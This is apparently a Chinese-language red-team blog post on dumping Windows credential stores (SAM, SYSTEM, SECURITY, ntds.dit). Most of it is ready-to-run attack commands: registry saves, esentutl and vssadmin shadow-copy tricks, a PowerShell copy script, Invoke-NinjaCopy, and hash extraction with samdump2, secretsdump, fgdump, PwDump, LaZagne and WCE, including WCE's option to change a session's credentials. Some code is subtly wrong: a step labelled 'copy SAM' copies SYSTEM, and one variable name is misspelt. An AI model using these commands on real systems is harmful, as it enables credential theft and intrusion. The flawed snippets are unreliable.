SAM转储 12 months ago red.ghostwolflab.com 2 minutes 此文件只为于 C:\windows\system32\config\SAM 和 C:\windows\system32\config\SYSTEM 中,不过该文件受到保护,不能使用常规复制导出它们。 注册表窃取 从注册表转储,使用以下命令即可: reg save HKLM\sam sam reg save HKLM\system system reg save HKLM\security security 将生成的文件移动到Kali Linux并运行以下命令即可提取HASH: ┌──(root㉿kali)-[~] └─# samdump2 ghost.system ghost.sam 也可以使用 impacket-secretsdump 工具提取: ┌──(root㉿kali)-[~] └─# impacket-secretsdump -sam ghost.sam -security ghost.security -system ghost.system LOCAL esentutl.exe 攻击者可以使用 Windows 自带的 esentutl.exe 程序转储 SAM/Security: esentutl.exe /y /vss C:\Windows\System32\config\SAM /d C:\Users\Administrator\Desktop\esentutl.sam 卷影复制 通过使用vssadmin工具将受保护的文件复制到自定义目录(需要管理员权限): vssadmin create shadow /for=C: # 复制 SAM copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\system32\config\SYSTEM C:\Extracted\SAM # 复制 SYSTEM copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\system32\config\SYSTEM C:\Extracted\SYSTEM # 复制 ntds.dit copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\ntds\ntds.dit C:\Extracted\ntds.dit # 创建卷影副本的符号链接并访问 mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\ 使用PowerShell脚本将SAM文件复制到C:\Users\Public\目录下: $service=(Get-Service -name VSS) if($service.Status -ne "Running"){$notrunning=1;$service.Start()} $id=(gwmi -list win32_shadowcopy).Create("C:\","ClientAccessible").ShadowID $volume=(gwmi win32_shadowcopy -filter "ID='$id'") cmd /c copy "$($volume.DeviceObject)\windows\system32\config\sam" C:\Users\Public $voume.Delete();if($notrunning -eq 1){$service.Stop()} Invoke-NinjaCopy 攻击者可以通过使用 PowerSploit 工具中的 Invoke-NinjaCopy 脚本来复制 SAM、SYSTEM、ntds.dit: Invoke-NinjaCopy.ps1 -Path "C:\Windows\System32\config\sam" -LocalDestination "C:\Users\Administrator\Desktop\SAM" 工具 fgdump.exe:该工具位于Kali Linux的/usr/share/windows-binaries/fgdump目录下,将其移动到目标Windows主机,以管理员权限运行该工具,将会在当前目录下生成三个文件,其中*.pwdump是导出的密码HASH: PwDump:该工具位于Kali Linux的/usr/share/windows-binaries/fgdump目录下,将其移动到目标Windows主机,运行以下命令将会提取SAM: .\PwDump.exe -o pwd -x 127.0.0.1 LaZagne:LaZagne项目是一个开源应用程序,用于检索本地计算机上存储的大量密码。每个软件都使用不同的技术(明文、API、自定义算法、数据库等)存储其密码。该工具的开发目的是为了查找最常用软件的密码。 laZagne.exe all WCE:Windows 凭据编辑器,用于列出登录会话以及添加、更改、列出和删除关联凭据(例如:LM/NT 哈希、纯文本密码和 Kerberos 票证)。该工具默认在Kali Linux的/usr/share/windows-resources/wce目录下,将其移动到Windows主机,运行以下命令即可获取凭据: # 列出登录的会话和 NTLM 凭据 wce.exe -l # 修改当前登录会话的 NTLM 凭据 wce.exe -s 用户名:域名:LM哈希:NT哈希 # 生成 LM 和 NT 的哈希 wce.exe -g 密码 # 保存所有的输出到一个文件 wce.exe -o 文件名 pwdump7:pwdump7 和其他pwdump 工具之间的主要区别在于通过从文件系统中提取二进制 SAM 和 SYSTEM 文件来运行,然后提取哈希值。